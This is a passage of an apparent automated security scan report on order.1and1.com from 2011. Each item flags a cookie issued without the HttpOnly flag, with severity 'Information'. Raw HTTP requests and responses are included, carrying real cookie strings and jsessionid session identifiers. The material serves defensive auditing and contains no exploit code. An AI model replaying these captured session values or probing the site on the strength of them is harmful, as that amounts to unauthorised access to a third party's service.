Set-Cookie: UT=3bGExNDUrVFRUTmFXXjtzbTosNm9iXDRLPjggJCEhIB4gHhsbNTQuMTUoKikoJUo4ZFlbaSEjHk4nUWA9MDEtLDEtKy4sJi4lJC1lZiwhKFhhJzEyLi0yLywvKi0uJyg=; Expires=Fri, 07-Apr-2079 21:53:13 GMT; Path=/
ETag: fdc362967b2cad5fff34de328fac6f24
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 17794


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...

5.36. http://order.1and1.com/xml/order/FeatureEmailEmail

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/FeatureEmailEmail

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: __PFIX_TST_ (the Set-Cookie header in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/FeatureEmailEmail HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 20 Mar 2011 18:40:55 GMT
Server: Apache
Set-Cookie: __PFIX_TST_=6cf6138224e39000; Path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/FeatureEmailEmail;jsessionid=E834C95B148F9F61B3526FF29F3A0E98.TCpfix142a
Content-Length: 0
Connection: close
Content-Type: text/plain


5.37. http://order.1and1.com/xml/order/FeatureEmailEmail

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/FeatureEmailEmail

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: UT (the Set-Cookie header in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/FeatureEmailEmail;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:40:59 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=LcWY2OTowWVlZU2ZcYylhWygaO3RnYTlQQz0lKSYmJSMlIyAgIyIcHyMtLy4tKk89aV5gbiYoI1MsVmUrHh8bGjYyMDMxKzMqKTJqazEmLV1mLB8gHBsgNDE0LzIzLC0=; Expires=Fri, 07-Apr-2079 21:55:06 GMT; Path=/
ETag: 136bbfa68f79af72651dea01141eea2e
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 19149


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...

5.38. http://order.1and1.com/xml/order/FeatureEmailVirusscan

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/FeatureEmailVirusscan

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: UT (the Set-Cookie header in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/FeatureEmailVirusscan;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:41:31 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=xZVoqLS4kZGRkXnFnbjRsZjMlL2hbVS1ENzEZHRoxMC4wLisrLi0nKi4hIyIhHkMxXVJUYjEzLl43YXA2KSomJSomJCclHyceHSZedjwxOGhxNyorJyYrKCUoIyYnICE=; Expires=Fri, 07-Apr-2079 21:55:38 GMT; Path=/
ETag: dce3cf5ad5748df30645181485283bac
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 18392


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...

5.39. http://order.1and1.com/xml/order/FeatureEmailVirusscan

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/FeatureEmailVirusscan

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/FeatureEmailVirusscan HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 20 Mar 2011 18:41:21 GMT
Server: Apache
Set-Cookie: __PFIX_TST_=548c6adb7fb0ec00; Path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/FeatureEmailVirusscan;jsessionid=C253A50FE167E9674ABDF45A2486EDEE.TCpfix142a
Content-Length: 0
Connection: close
Content-Type: text/plain


5.40. http://order.1and1.com/xml/order/FeatureEmailWebmail

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/FeatureEmailWebmail

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/FeatureEmailWebmail HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 20 Mar 2011 18:41:02 GMT
Server: Apache
Set-Cookie: __PFIX_TST_=ca8f83ac4f85c00; Path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/FeatureEmailWebmail;jsessionid=05FB253BDCD8907CE3C9A9ACB3FB95CB.TCpfix141a
Content-Length: 0
Connection: close
Content-Type: text/plain


5.41. http://order.1and1.com/xml/order/FeatureEmailWebmail

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/FeatureEmailWebmail

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/FeatureEmailWebmail;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:41:21 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=FYGw8P0A2X19fWWxiaS9nYS4gKmNWUCg/SUMrLywsKykrKSYmKSgiJSkcHh0cGT5Db2RmdCwuKVkyXGsxJCUhICUhHyIgGjkwLzhwcTcsM2NsMiUmIiEmIyAjHiEiMjM=; Expires=Fri, 07-Apr-2079 21:55:28 GMT; Path=/
ETag: 05d3a4641a7d28dc45df37f735a690a2
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 16786


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...

5.42. http://order.1and1.com/xml/order/FeatureFtpBackup

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/FeatureFtpBackup

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/FeatureFtpBackup HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 20 Mar 2011 18:49:55 GMT
Server: Apache
Set-Cookie: __PFIX_TST_=3c09b335ce42b800; Path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/FeatureFtpBackup;jsessionid=9E2BB933F823CE1707E9AAA0DB33A443.TCpfix141a
Content-Length: 0
Connection: close
Content-Type: text/plain


5.43. http://order.1and1.com/xml/order/FeatureGuaranteeMoneyback

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/FeatureGuaranteeMoneyback

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/FeatureGuaranteeMoneyback;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:46:21 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=0b2Q0NzguV1dXUWRaYSdfWT0vOXJlXzdOQTsjJyQkIyEjIR4eISAaNDgrLSwrKE07Z1xebCQmIVEqVGMpHB0wLzQwLjEvKTEoJzBoaS8kK1tkKh0eGjA1Mi8yLTAxKis=; Expires=Fri, 07-Apr-2079 22:00:28 GMT; Path=/
ETag: a44e5ebe702505444200d69327f9a64e
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 17405


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...

5.44. http://order.1and1.com/xml/order/FeatureGuaranteeMoneyback

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/FeatureGuaranteeMoneyback

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/FeatureGuaranteeMoneyback HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 20 Mar 2011 18:46:13 GMT
Server: Apache
Set-Cookie: __PFIX_TST_=4eea5ce422d8c800; Path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/FeatureGuaranteeMoneyback;jsessionid=840C8FF14A96F2E88E83B121AD4FBAA6.TCpfix140a
Content-Length: 0
Connection: close
Content-Type: text/plain


5.45. http://order.1and1.com/xml/order/FeatureMarketingCtrCitysearch

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/FeatureMarketingCtrCitysearch

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/FeatureMarketingCtrCitysearch HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 20 Mar 2011 18:44:35 GMT
Server: Apache
Set-Cookie: __PFIX_TST_=11ac57a25b290000; Path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/FeatureMarketingCtrCitysearch;jsessionid=0ADFC54DD8D5331E15B7FC8E10623743.TCpfix140a
Content-Length: 0
Connection: close
Content-Type: text/plain


5.46. http://order.1and1.com/xml/order/FeatureMarketingCtrCitysearch

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/FeatureMarketingCtrCitysearch

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/FeatureMarketingCtrCitysearch;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:44:48 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=eYVY9QEE3YGBgWm1jajBoYi8hK2RXUSlAM0QsMC0tLCosKicnKikjJiodHx4dGj8tcGVndS0vKlozXWwyJSYiISYiICMhGyMxMDlxcjgtNGRtMyYnIyInJCEkHyIjHDQ=; Expires=Fri, 07-Apr-2079 21:58:55 GMT; Path=/
ETag: 0b09543973cc53495b987ed876a0d975
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 19136


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...

5.47. http://order.1and1.com/xml/order/FeatureMarketingCtrGoogleAdWords

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/FeatureMarketingCtrGoogleAdWords

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/FeatureMarketingCtrGoogleAdWords HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 20 Mar 2011 18:44:13 GMT
Server: Apache
Set-Cookie: __PFIX_TST_=1bca04215a9d2000; Path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/FeatureMarketingCtrGoogleAdWords;jsessionid=BCEE8FC0810424623B59EFF358DB720C.TCpfix142a
Content-Length: 0
Connection: close
Content-Type: text/plain


5.48. http://order.1and1.com/xml/order/FeatureMarketingCtrGoogleAdWords

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/FeatureMarketingCtrGoogleAdWords

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

